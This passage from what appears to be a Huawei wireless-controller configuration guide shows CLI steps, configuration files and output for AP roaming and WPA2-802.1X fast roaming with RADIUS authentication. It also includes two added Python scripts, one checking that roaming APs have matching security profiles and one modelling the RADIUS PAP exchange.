Warning: Modify the country code may delete configuration on those AP which use
the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.


[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the AC ID to 1.

# Configure the source interface.


[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 5 Manage APs on the AC.


# Check the AP type IDs after obtaining the MAC addresses of the APs.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------


ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
APs offline based on the AP type ID. Assume that the type of AP1 and AP2 is AP6010DN-AGN,
and their MAC addresses are 60de-4476-e360 and dcd2-fc04-b500 respectively.
[AC-wlan-view] ap id 1 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 type-id 19 mac dcd2-fc04-b500
[AC-wlan-ap-2] quit

# Configure an AP region and add the APs to the AP region.


[AC-wlan-view] ap-region id 10 //Create AP region 10
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 1
[AC-wlan-ap-1] region-id 10 //Add AP1 to region 10
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2
[AC-wlan-ap-2] region-id 10 //Add AP2 to region 10
[AC-wlan-ap-2] quit

# After powering on AP1 and AP2, run the display ap all command on the AC to check the
AP running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[2],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP   AP             AP               Profile    AP       AP
                                     /Region
ID   Type           MAC              ID         State    Sysname
------------------------------------------------------------------------------
1 AP6010DN-AGN 60de-4476-e360 0/10 normal ap-1
2 AP6010DN-AGN dcd2-fc04-b500 0/10 normal ap-2
------------------------------------------------------------------------------
Total number: 2,printed: 2

Step 6 Configure WLAN service parameters.

# Create a WMM profile named wmm.


[AC-wlan-view] wmm-profile name wmm id 1


[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create WLAN-ESS interface 1.


[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] quit

# Create a security profile named security.


[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] security-policy wpa2 //Configure security policy WPA2.
[AC-wlan-sec-prof-security] wpa2 authentication-method psk pass-phrase cipher huawei123 encryption-method ccmp //Set the encryption method to PSK+CCMP.
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic.


[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Create a service set named test and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set.
[AC-wlan-view] service-set name test id 1
[AC-wlan-service-set-test] ssid test //Set the SSID to test.
[AC-wlan-service-set-test] wlan-ess 1
[AC-wlan-service-set-test] security-profile name security
[AC-wlan-service-set-test] traffic-profile name traffic
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of the service set to 101. By default, the VLAN ID of a service set is 1.
[AC-wlan-service-set-test] forward-mode tunnel //Set the service forwarding mode to tunnel.
[AC-wlan-service-set-test] quit

Step 7 Verify the configuration.


After the configuration is complete, the STA can connect to the WLAN with the SSID test in
the coverage area of AP1.
Assume that the STA MAC address is 0025-86aa-0d1c. When the STA connects to the
WLAN with the SSID test in the coverage area of AP1, run the display station assoc-info ap
1 command on the AC to check the STA access information.
<HUAWEI> display station assoc-info ap 1
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------
0025-86aa-0d1c 1 0 0 test
------------------------------------------------------------------------------
Total stations: 1

When the STA moves from the coverage of AP1 to AP2, run the display station assoc-info
ap 2 command on the AC to check the STA access information. The STA is associated with
AP2.
<HUAWEI> display station assoc-info ap 2
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------


0025-86aa-0d1c 2 0 1 test
------------------------------------------------------------------------------
Total stations: 1

Run the display station roam-track sta 0025-86aa-0d1c command on the AC to check the
STA roaming track.
<HUAWEI> display station roam-track sta 0025-86aa-0d1c
------------------------------------------------------------------------------
AP ID Radio ID BSSID TIME
------------------------------------------------------------------------------
1 0 60de-4476-e360 2012/12/23 14:40:37
2 0 dcd2-fc04-b500 2012/12/23 14:40:39
------------------------------------------------------------------------------
Number of roam track: 1

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 101
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 101
#
interface Wlan-Ess1


port trunk allow-pass vlan 101


#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 1 type-id 19 mac 60de-4476-e360 sn 190901007618
region-id 10
ap id 2 type-id 19 mac dcd2-fc04-b500 sn 190901007619
region-id 10
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
security-policy wpa2
wpa2 authentication-method psk pass-phrase cipher %@%@}PSoXN{buC{{i+L![@/I<|C"%@%@ encryption-method ccmp
service-set name test id 1
forward-mode tunnel
wlan-ess 1
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 101
radio-profile name radio id 1
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
service-set id 1 wlan 1
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
service-set id 1 wlan 1
#
return

15.9.2 Example for Configuring Fast Roaming Between APs in the Same Service VLAN

Roaming Between APs in the Same Service VLAN Overview


WLAN roaming allows an STA to move from the coverage area of an AP to that of another
AP with nonstop service transmission. Roaming between APs in the same service VLAN
allows an STA to move between two APs that connect to the same AC and belong to the same
service VLAN without service interruption.

Roaming between APs in the same service VLAN is classified into fast roaming and non-fast
roaming. Non-fast roaming technology is used when an STA uses a non-WPA2-802.1x
security policy. If an STA uses WPA2-802.1x but does not support fast roaming, the STA still
needs to complete 802.1x authentication before roaming between two APs. When the user
uses the WPA2-802.1x security policy and supports fast roaming, the user does not need to
perform 802.1x authentication again during roaming and only needs to perform key
negotiation. In this case, fast roaming reduces the roaming delay and improves the WLAN
service experience.

Configuration Notes
l The APs on which WLAN roaming is implemented must use the same SSID and security
profiles, and the security profiles must have the same configurations.
l In direct forwarding mode, if the ARP entry of a user is not aged out in time on the
access device connected to the AP after the user roams, services of the user will be


temporarily interrupted. You are advised to enable STA address learning on the AC.
After the function is enabled, the AP will send a gratuitous ARP packet to the access
device so that the access device can update ARP entries in a timely manner. This ensures
nonstop service transmission during user roaming.
You can use either of the following methods to enable STA address learning according to
the version of your product:
– Versions earlier than V200R007C20 and V200R008: run the learn client ip-address
enable command in the service set view.
– V200R007C20: run the undo learn-client-address disable command in the VAP
profile view.
l If direct forwarding is used, configure port isolation on the interface that directly
connects to the APs. If port isolation is not configured, a large number of broadcast
packets will be transmitted in the VLANs, or WLAN users on different APs will be able to
communicate directly at Layer 2.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 15-25 Applicable products and versions

Software Version   Product Model   AP Model and Version
V200R005C00        S12700          V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00        S12700          V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00        S12700          V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN,
                                   AP8030DN, AP8130DN
                                   V200R005C20: AP7030DE, AP9330DN
V200R008C00        S12700          V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN,
                                   AP8030DN, AP8130DN
                                   V200R005C20: AP7030DE, AP9330DN
                                   V200R005C30: AP2030DN, AP4030DN, AP4130DN
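The first Configuration Note in 15.9.1 and 15.9.2 above requires every AP taking part in roaming to advertise the SSID through identically configured security profiles. The following added Python script (not Huawei code) checks that prerequisite by parsing the wlan block of an AC configuration file in the format shown under Configuration Files in 15.9.1; the sample configuration is constructed, and its ciphertext placeholders are not real values.

```python
"""Roaming prerequisite check (added example, not Huawei code): every AP radio
advertising an SSID must bind a service set whose security profile settings are
identical. Parses the wlan block of an AC configuration file. Encrypted keys
(%@%@...%@%@) are masked because the ciphertext differs for each encryption, so
matching pass-phrases must be verified separately."""
import re
from collections import defaultdict

CIPHER_RE = re.compile(r"cipher\s+\S+")
RADIO_RE = re.compile(r"ap (\d+) radio (\d+)$")
NAMED = ("security-profile", "traffic-profile", "wmm-profile", "radio-profile",
         "service-set")


def parse_wlan_block(config):
    """Return (profiles[(kind, id)] -> {'name', 'attrs'}, radios[(ap, radio)] -> attrs)."""
    profiles, radios, ctx, in_wlan = {}, {}, None, False
    for raw in config.splitlines():
        line = raw.strip()
        if not in_wlan:
            in_wlan = line == "wlan"
            continue
        if not line or line == "#":
            continue
        if line == "return":
            break
        tok = line.split()
        m = RADIO_RE.match(line)
        if m:  # "ap 1 radio 0": the radio's own settings follow
            ctx = radios.setdefault((int(m[1]), int(m[2])), [])
        elif len(tok) > 4 and tok[0] in NAMED and tok[1] == "name":
            entry = {"name": tok[2], "attrs": []}  # e.g. "service-set name test id 1"
            profiles[(tok[0], int(tok[4]))] = entry
            ctx = entry["attrs"]
        elif tok[0] in ("ap", "ap-region"):  # AP identity lines are not checked
            ctx = None
        elif ctx is not None:
            ctx.append(CIPHER_RE.sub("cipher <masked>", line))
    return profiles, radios


def attr(attrs, prefix):
    """Value of the first attribute line that starts with prefix, else None."""
    for a in attrs:
        if a.startswith(prefix + " "):
            return a[len(prefix) + 1:]
    return None


def check_roaming_security(config):
    """Return findings as strings; an empty list means every SSID is consistent."""
    profiles, radios = parse_wlan_block(config)
    by_ssid = defaultdict(dict)  # ssid -> {(ap, radio): security settings}
    findings = []
    for (ap, radio), attrs in sorted(radios.items()):
        bound = attr(attrs, "service-set id")
        if bound is None:
            continue
        ss = profiles.get(("service-set", int(bound.split()[0])))
        sec_id = attr(ss["attrs"], "security-profile id") if ss else None
        sec = profiles.get(("security-profile", int(sec_id))) if sec_id else None
        if sec is None:
            findings.append(f"AP {ap} radio {radio}: service set {bound} has no valid security profile")
            continue
        by_ssid[attr(ss["attrs"], "ssid")][(ap, radio)] = tuple(sorted(sec["attrs"]))
    for ssid, per_radio in by_ssid.items():
        if len(set(per_radio.values())) > 1:
            aps = sorted({ap for ap, _ in per_radio})
            findings.append(f"SSID {ssid}: security settings differ across APs {aps}; "
                            "roaming prerequisite violated")
    return findings


# Constructed sample, not a captured configuration: AP2 advertises SSID test
# through a second service set bound to a different (WPA/TKIP) profile.
SAMPLE = """\
wlan
 security-profile name security id 1
  security-policy wpa2
  wpa2 authentication-method psk pass-phrase cipher %@%@CIPHERTEXT-A%@%@ encryption-method ccmp
 security-profile name legacy id 2
  security-policy wpa
  wpa authentication-method psk pass-phrase cipher %@%@CIPHERTEXT-B%@%@ encryption-method tkip
 service-set name test id 1
  forward-mode tunnel
  ssid test
  security-profile id 1
 service-set name test-legacy id 2
  forward-mode tunnel
  ssid test
  security-profile id 2
 ap 1 radio 0
  service-set id 1 wlan 1
 ap 2 radio 0
  service-set id 2 wlan 1
return
"""

if __name__ == "__main__":
    for finding in check_roaming_security(SAMPLE) or ["all SSIDs consistent"]:
        print(finding)
```

Pointing service set 2 at security profile 1 (or removing the second service set) clears the finding, which is exactly the state the note requires before roaming is tested.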

Networking Requirements
As shown in Figure 15-11, a department in a campus network deploys two APs that are
managed and controlled by an AC. The AC dynamically assigns IP addresses to the APs and
STAs. All users in the department belong to the same VLAN, that is, AP1 and AP2 use the
same service VLAN. The security policy WPA2-802.1X is used. User data is forwarded
through tunnels.
The department requires that services should not be interrupted when a STA moves from AP1
to AP2.


Figure 15-11 Networking diagram for configuring fast roaming between APs in the same
service VLAN

[Figure 15-11: the Internet connects to the AC on GE1/0/3 (VLAN 101); the RADIUS server (192.168.0.2/24) connects to the AC on GE1/0/4 (VLAN 102); the AC connects on GE1/0/1 (VLAN 100) to SwitchA GE0/0/3 (VLAN 100); SwitchA GE0/0/1 and GE0/0/2 (VLAN 100) connect AP1 and AP2, both with SSID test, on channel 1 and channel 6; the STA roams from AP1 to AP2. Management VLAN: VLAN 100. Service VLAN: VLAN 101. AP region ID: 10.]

Data Planning

Table 15-26 Data planning

Item                                     Data                                                 Description
IP address of the AC's source interface  192.168.10.1/24                                      None
WMM profile                              Name: wmm                                            None
Radio profile                            Name: radio                                          None
Security profile                         Name: security                                       None
                                         Security and authentication policy: WPA2+802.1X
                                         Authentication key: hello
                                         Encryption mode: CCMP
Traffic profile                          Name: traffic                                        None
Service set                              Name: test                                           None
                                         SSID: test
                                         WLAN virtual interface: WLAN-ESS 1
                                         Data forwarding mode: tunnel forwarding
DHCP server                              The AC functions as the DHCP server to assign IP     None
                                         addresses to APs and STAs.
AP gateway and IP address pool range     VLANIF 100: 192.168.10.1/24                          None
                                         192.168.10.2 to 192.168.10.254/24
STA gateway and IP address pool range    VLANIF 101: 192.168.11.1/24                          None
                                         192.168.11.2 to 192.168.11.254/24

Configuration Roadmap
The configuration roadmap is as follows:
1. The security policy WPA2-802.1X is used and access authentication is required, which
results in longer roaming switchover time. Configure fast roaming between APs in the
same service VLAN to ensure nonstop service transmission during roaming.
2. Configure parameters used for communication between the AC and APs to transmit
CAPWAP packets.
3. Configure the AC to function as a DHCP server to assign IP addresses to the STAs and
APs.
4. Configure basic WLAN services to enable the STAs to connect to the WLAN.
5. Configure key negotiation between STAs and APs to shorten the roaming switchover
time.

Procedure
Step 1 Set the NAC mode on AC to unified mode (default setting). Configure SwitchA and the AC
so that the APs and AC can transmit CAPWAP packets.
# Configure SwitchA: add interfaces GE0/0/1, GE0/0/2, and GE0/0/3 to management
VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100


[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100


[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3
[SwitchA-gigabitethernet0/0/3] port link-type trunk
[SwitchA-gigabitethernet0/0/3] port trunk allow-pass vlan 100
[SwitchA-gigabitethernet0/0/3] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.


# Add the AC uplink interface GE1/0/3 to VLAN 101 and add GE1/0/4 of the AC connecting
to the RADIUS server to VLAN 102.
[AC] vlan batch 101 102
[AC] interface gigabitethernet 1/0/3
[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/3] quit
[AC] interface gigabitethernet 1/0/4
[AC-GigabitEthernet1/0/4] port link-type trunk
[AC-GigabitEthernet1/0/4] port trunk pvid vlan 102
[AC-GigabitEthernet1/0/4] port trunk allow-pass vlan 102
[AC-GigabitEthernet1/0/4] quit

Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and APs, and configure
VLANIF 102 to allow the AC to communicate with the RADIUS server.
# Configure a DHCP server to assign IP addresses to the APs from the IP address pool on
VLANIF 100 and assign IP addresses to STAs from the IP address pool on VLANIF 101.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.11.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit

# Configure VLANIF 102.
[AC] interface vlanif 102
[AC-Vlanif102] ip address 192.168.0.1 24
[AC-Vlanif102] quit

Step 4 Configure an AAA domain to which a RADIUS server template is applied.
1. Configure a RADIUS server template, an AAA authentication scheme, and domain
information.
NOTE
Ensure that the AC and RADIUS server have the same shared key.
[AC] radius-server template radius_huawei //Create a RADIUS server template.
[AC-radius-radius_huawei] radius-server authentication 192.168.0.2 1812 //Specify the IP address and the port number of a RADIUS authentication server.
[AC-radius-radius_huawei] radius-server shared-key cipher hello //Configure the shared key of a RADIUS server.
[AC-radius-radius_huawei] quit
[AC] aaa
[AC-aaa] authentication-scheme radius_huawei //Create an authentication scheme.
[AC-aaa-authen-radius_huawei] authentication-mode radius //Set the authentication mode to radius.
[AC-aaa-authen-radius_huawei] quit
[AC-aaa] domain huawei.com //Create a domain.
[AC-aaa-domain-huawei.com] authentication-scheme radius_huawei //Configure an authentication scheme in the domain.
[AC-aaa-domain-huawei.com] radius-server radius_huawei //Configure a RADIUS server template for the domain.
[AC-aaa-domain-huawei.com] quit
[AC-aaa] quit

NOTE
After domain huawei.com is configured, the domain name is added to the authentication user
name.
2. Test whether a STA can be authenticated using RADIUS authentication. A user name
test@huawei.com and password 123456 have been configured on the RADIUS server.
[AC] test-aaa test@huawei.com 123456 radius-template radius_huawei
Info: Account test succeed.
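
What the test-aaa step exercises on the wire, as an added Python example that is not part of the original document or Huawei code: a model of the RFC 2865 PAP Access-Request/Access-Accept exchange, showing why the AC and the RADIUS server must hold the same shared key. The server's account table, the packet identifier and the Request Authenticator used in the example are assumptions; user name, password, shared key and addresses are the ones configured above.

```python
"""RFC 2865 Access-Request/Access-Accept exchange behind the test-aaa check.

Added example, not Huawei code.  The AC (RADIUS client) hides the PAP password
with the shared key, the server recovers it with its own copy, and the AC accepts
the reply only if the Response Authenticator verifies under the AC's key.  User
test@huawei.com / 123456, shared key hello and AC address 192.168.0.1 come from
the steps above; the server's account table below is constructed for the example.
"""
import hashlib
import hmac
import os
import socket
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_USER_PASSWORD, ATTR_NAS_IP_ADDRESS = 1, 2, 4

# Constructed stand-in for the user entry configured on the RADIUS server.
ACCOUNTS = {"test@huawei.com": b"123456"}


def _xor_chain(data, secret, authenticator, hiding):
    """RFC 2865 section 5.2: each 16-byte block is XORed with MD5(secret + previous
    ciphertext block), block 0 with MD5(secret + Request Authenticator).  Hiding
    chains the output block, recovery chains the input (ciphertext) block."""
    out, prev = b"", authenticator
    for i in range(0, len(data), 16):
        chunk = data[i:i + 16]
        key = hashlib.md5(secret + prev).digest()
        block = bytes(a ^ b for a, b in zip(chunk, key))
        out += block
        prev = block if hiding else chunk
    return out


def hide_password(password, secret, authenticator):
    padded = password + b"\x00" * (-len(password) % 16)  # pad to a multiple of 16
    return _xor_chain(padded, secret, authenticator, hiding=True)


def recover_password(hidden, secret, authenticator):
    return _xor_chain(hidden, secret, authenticator, hiding=False).rstrip(b"\x00")


def _attr(attr_type, value):
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def parse_attrs(payload):
    attrs, pos = {}, 0
    while pos + 2 <= len(payload):
        attr_type, length = payload[pos], payload[pos + 1]
        if length < 2 or pos + length > len(payload):
            raise ValueError("malformed RADIUS attribute")
        attrs[attr_type] = payload[pos + 2:pos + length]
        pos += length
    return attrs


def build_access_request(ident, username, password, secret, nas_ip, authenticator=None):
    """Client side; the Request Authenticator must be fresh random per request."""
    authenticator = authenticator or os.urandom(16)
    attrs = (_attr(ATTR_USER_NAME, username.encode())
             + _attr(ATTR_USER_PASSWORD, hide_password(password.encode(), secret, authenticator))
             + _attr(ATTR_NAS_IP_ADDRESS, socket.inet_aton(nas_ip)))
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + authenticator + attrs


def build_response(code, request, secret, attrs=b""):
    """Server side: Response Authenticator = MD5(Code+ID+Length+RequestAuth+Attrs+Secret)."""
    header = struct.pack("!BBH", code, request[1], 20 + len(attrs))
    return header + hashlib.md5(header + request[4:20] + attrs + secret).digest() + attrs


def verify_response(response, request, secret):
    """Client side: a reply whose authenticator fails under the AC's key (forged, or
    built with a mismatched shared key) is discarded, as RFC 2865 requires."""
    _code, ident, length = struct.unpack("!BBH", response[:4])
    if ident != request[1] or length != len(response):
        return False
    expected = hashlib.md5(response[:4] + request[4:20] + response[20:] + secret).digest()
    return hmac.compare_digest(response[4:20], expected)


def radius_server(request, server_secret, accounts):
    """Minimal server: recover the PAP password and compare it with the account table."""
    attrs = parse_attrs(request[20:])
    user = attrs.get(ATTR_USER_NAME, b"").decode(errors="replace")
    password = recover_password(attrs.get(ATTR_USER_PASSWORD, b""), server_secret, request[4:20])
    ok = user in accounts and hmac.compare_digest(password, accounts[user])
    return build_response(ACCESS_ACCEPT if ok else ACCESS_REJECT, request, server_secret)


def run_test_aaa(username, password, ac_secret, server_secret, accounts=ACCOUNTS):
    """Models '[AC] test-aaa <user> <password> radius-template radius_huawei'.  A key
    mismatch fails twice: garbled password at the server, unverifiable reply at the AC."""
    request = build_access_request(1, username, password, ac_secret, "192.168.0.1")
    response = radius_server(request, server_secret, accounts)
    return verify_response(response, request, ac_secret) and response[0] == ACCESS_ACCEPT
```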

Step 5 Configure AC system parameters.
# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use
the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.
[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the AC ID to 1.

# Configure the source interface.
[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 6 Manage APs on the AC.
# Check the AP type IDs after obtaining the MAC addresses of the APs.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
APs offline based on the AP type ID. Assume that the type of AP1 and AP2 is AP6010DN-
AGN, and their MAC addresses are 60de-4476-e360 and dcd2-fc04-b500 respectively.
[AC-wlan-view] ap id 1 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 type-id 19 mac dcd2-fc04-b500
[AC-wlan-ap-2] quit

# Configure an AP region and add the APs to the AP region.
[AC-wlan-view] ap-region id 10 //Create AP region 10
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 1
[AC-wlan-ap-1] region-id 10 //Add AP1 to region 10
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2
[AC-wlan-ap-2] region-id 10 //Add AP2 to region 10
[AC-wlan-ap-2] quit

# After powering on AP1 and AP2, run the display ap all command on the AC to check the
AP running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[2],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP ID   AP Type        AP MAC           Profile ID/Region ID   AP State   AP Sysname
------------------------------------------------------------------------------
1 AP6010DN-AGN 60de-4476-e360 0/10 normal ap-1
2 AP6010DN-AGN dcd2-fc04-b500 0/10 normal ap-2
------------------------------------------------------------------------------
Total number: 2,printed: 2

Step 7 Configure WLAN service parameters.
# Create a WMM profile named wmm and retain the default parameter settings.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] channel-mode fixed
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create WLAN-ESS interface 1.
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] authentication dot1x //Enable 802.1x authentication.
[AC-Wlan-Ess1] dot1x authentication-method eap //Configure EAP relay authentication for 802.1x users.
[AC-Wlan-Ess1] domain name huawei.com force //Configure a forcible authentication domain.
[AC-Wlan-Ess1] permit-domain name huawei.com //Configure a permitted domain for WLAN users.
[AC-Wlan-Ess1] quit

# Create a security profile named security and configure the security policy to
WPA2-802.1X.
[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] security-policy wpa2
[AC-wlan-sec-prof-security] wpa2 authentication-method dot1x encryption-method ccmp //Configure WPA2 802.1x authentication and encryption.
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic and retain the default parameter settings.
[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Create a service set named test and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set.
[AC-wlan-view] service-set name test id 1
[AC-wlan-service-set-test] ssid test
[AC-wlan-service-set-test] wlan-ess 1
[AC-wlan-service-set-test] security-profile name security
[AC-wlan-service-set-test] traffic-profile name traffic
[AC-wlan-service-set-test] service-vlan 101
[AC-wlan-service-set-test] forward-mode tunnel
[AC-wlan-service-set-test] quit

# Configure a VAP.
[AC-wlan-view] ap 1 radio 0
[AC-wlan-radio-1/0] radio-profile name radio
[AC-wlan-radio-1/0] channel 20mhz 1
[AC-wlan-radio-1/0] service-set name test
[AC-wlan-radio-1/0] quit
[AC-wlan-view] ap 2 radio 0
[AC-wlan-radio-2/0] radio-profile name radio
[AC-wlan-radio-2/0] channel 20mhz 6
[AC-wlan-radio-2/0] service-set name test
[AC-wlan-radio-2/0] quit

# Commit the configuration.
[AC-wlan-view] commit ap 1
Warning: Committing configuration may cause service interruption, continue?[Y/N]
:y
[AC-wlan-view] commit ap 2
Warning: Committing configuration may cause service interruption, continue?[Y/N]
:y

Step 8 Verify the configuration.
After the configuration is complete, the STA can discover the WLAN with the SSID test in
